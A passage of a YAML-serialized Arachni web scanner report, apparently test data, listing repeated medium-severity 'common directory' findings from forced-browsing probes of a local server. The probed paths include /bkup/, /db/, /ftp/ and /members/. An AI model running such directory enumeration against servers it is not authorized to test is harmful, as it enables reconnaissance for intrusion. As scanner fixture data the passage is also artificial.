  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/WebTrend/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "8"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: WebTrend
    injected: WebTrend
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: WebTrend
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/WebTrend/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/support/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: support
    injected: support
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: support
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/support/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/msql/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "4"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: msql
    injected: msql
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: msql
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/msql/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/user/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "4"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: user
    injected: user
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: user
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/user/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/demo/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "4"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: demo
    injected: demo
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: demo
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/demo/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/bkup/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "4"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: bkup
    injected: bkup
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: bkup
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/bkup/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/demos/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "5"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: demos
    injected: demos
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: demos
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/demos/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/mp3/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "3"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: mp3
    injected: mp3
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: mp3
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/mp3/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/db/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "2"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: db
    injected: db
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: db
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/db/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/ftp/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "3"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: ftp
    injected: ftp
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: ftp
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/ftp/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/ibill/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "5"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: ibill
    injected: ibill
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: ibill
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/ibill/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/incoming/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "8"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: incoming
    injected: incoming
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: incoming
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/incoming/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/member/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "6"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: member
    injected: member
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: member
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/member/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/members/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: members
    injected: members
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: members
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/members/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/orders/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "6"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: orders
    injected: orders
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: orders
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/orders/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/sample/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "6"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: sample
    injected: sample
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: sample
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/sample/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/samples/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: samples
    injected: samples
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: samples
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/samples/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/scripts/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: scripts
    injected: scripts
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: scripts
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/scripts/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/stats/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "5"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: stats
    injected: stats
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: stats
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/stats/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/sitestats/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "9"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: sitestats
    injected: sitestats
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: sitestats
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/sitestats/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
